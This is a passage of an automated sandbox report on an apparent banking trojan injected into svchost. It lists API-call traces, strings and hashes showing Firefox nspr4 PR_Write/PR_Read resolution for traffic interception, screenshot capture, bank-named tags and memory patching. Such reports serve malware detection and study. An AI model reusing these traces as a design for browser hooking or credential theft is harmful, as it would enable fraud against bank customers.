                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                              • Part of subcall function 02C7CBF0: memset.MSVCRT ref: 02C7CC09
                                                                                                                                                                                                              • Part of subcall function 02C7CBF0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C7CC22
                                                                                                                                                                                                              • Part of subcall function 02C98320: malloc.MSVCRT ref: 02C98332
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C77437
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C77445
                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C7744F
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C774F2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77501
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77530
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7753F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7754D
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02C77556
                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000), ref: 02C7759C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
                                                                                                                                                                                                            • String ID: user!965543!09C06683$P0Wu$fuck
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$fwrite$fseek$fclosefread
                                                                                                                                                                                                            • String ID: 6d1da759
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C909CA
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A0C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90A18
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90A1C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A2D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90A34
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A63
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90A69
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90A6D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A7E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90A85
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C90ABA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C90AD0
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da7aa$scrs
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A17A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A1BC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8A1C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8A1CC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A1DD
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8A1E4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A213
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8A219
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8A21D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A22E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8A235
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8A280
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da3b2$scrs
                                                                                                                                                                                                            • API String ID: 224938940-726422850
                                                                                                                                                                                                            • Opcode ID: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                            • Instruction ID: 81399e7e759840fcf260adc1e0ba70d5316192ef898cd4b424ea9abbfecd5d93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70315871E002989BCB21EB349C98BEB7BA8EF85304F0486D5E989C3100DF30DA54CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C9198A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C919CC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C919D8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C919DC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C919ED
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C919F4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91A23
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91A29
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C91A2D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C91A3E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91A45
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C91A7A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C91A90
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da6b7$scrs
                                                                                                                                                                                                            • API String ID: 224938940-862046869
                                                                                                                                                                                                            • Opcode ID: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                            • Instruction ID: 97337809144342f5afb747c78701df50d7f1a3d8e6f0a197024a797b0774a99a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34313571E402995FCB21DB34AC5DBEB7BA8AF85300F0946D4E989C3100DFB0DA58CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E70A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E74C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E758
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E75C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E76D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E774
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E7A3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E7A9
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E7AD
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E7BE
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E7C5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8E7FA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8E810
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da208$scrs
                                                                                                                                                                                                            • API String ID: 224938940-4063727140
                                                                                                                                                                                                            • Opcode ID: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                            • Instruction ID: c012ed745ce7834b89328ee85ffa25eefdb54afe5cdcc30dafb8a318effbca9e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4314871D402985BC721EB349C58BEB77A8AF85704F0589D4FA85C3101DF70DA54CBA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C916BA
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C916FC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91708
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9170C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9171D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91724
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91753
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91759
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9175D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9176E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91775
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C917AA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C917C0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6D1DA718$scrs
                                                                                                                                                                                                            • API String ID: 224938940-3376271743
                                                                                                                                                                                                            • Opcode ID: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                            • Instruction ID: d0669bbe0d88d5412a30cdd21ac2ea9879cccbf1a7e9ba89ea04bb6e565d3bca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3310771D4029A5BCB119B749C5DBEB77E8EF85700F4846D4EA89C3100DF71DA55CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C90BA7
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da7aa,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da7aa$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RAIFF
                                                                                                                                                                                                            • API String ID: 505831200-2981933777
                                                                                                                                                                                                            • Opcode ID: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
                                                                                                                                                                                                            • Instruction ID: e6b70bb27d61c34d8a9be23afc102e9d7ab718ba819a6fa34f7ce02b850e8a58
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11B630AC9755BAF7126B658C1EF1E37DC5F44B19F104654F551A30C1EBF0E9008AAA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91B67
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da6b7,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da6b7$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$RSTYLE
                                                                                                                                                                                                            • API String ID: 505831200-1961891315
                                                                                                                                                                                                            • Opcode ID: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
                                                                                                                                                                                                            • Instruction ID: b08893210dbc9ebcc0b73e871e23fbd590f2a43a74c877046b024da61a8c4ed2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C11E630AC47537BF6126B658C0FF1A369C9F81B64F184654F919620C1EBF4A9008A7B
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(nspr4.dll,00000000,00000000,00000000,02C84822), ref: 02C7EEBA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 02C7EED7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 02C7EEF3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 02C7EF0F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 02C7EF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 02C7EF47
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 02C7EF54
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 02C7EF61
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Virtual$Protect$AllocLibraryLoadmemcpy
                                                                                                                                                                                                            • String ID: PR_Close$PR_GetError$PR_GetNameForIdentity$PR_OpenTCPSocket$PR_Read$PR_SetError$PR_Write$nspr4.dll
                                                                                                                                                                                                            • API String ID: 1577031324-943613760
                                                                                                                                                                                                            • Opcode ID: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                            • Instruction ID: 6d5524f4b433b16b8db29e1f5193a618bd92d53aeb5a8604d07816fc66f55455
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5017973BC536632B91336751C46FCB574D8EC1E48F0649B1F803B1944DBD5E1028879
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,75573050,755730D0,75573080), ref: 02C83EC7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C83ECA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83EDE
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02C83F05
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F23
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F2D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83F30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F3D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83F40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C83F58
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C83F5F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83F6F
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F85
                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 02C83FB1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83FE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FF4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83FF7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1718479325-0
                                                                                                                                                                                                            • Opcode ID: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                            • Instruction ID: b88085a35273208d51dc973e77e834283b74a67b41c9b3ff78c4246472cfc672
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0241E332E40294ABDB21AF65DC48F9A7B78EF80B09F0185D4FD0497280DB72DA45CBE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C84060
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8408C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,0000001C,0000001C), ref: 02C840B3
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000005), ref: 02C840E4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8410D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02C84125
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(-00000010), ref: 02C84133
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000004), ref: 02C84165
                                                                                                                                                                                                            Strings
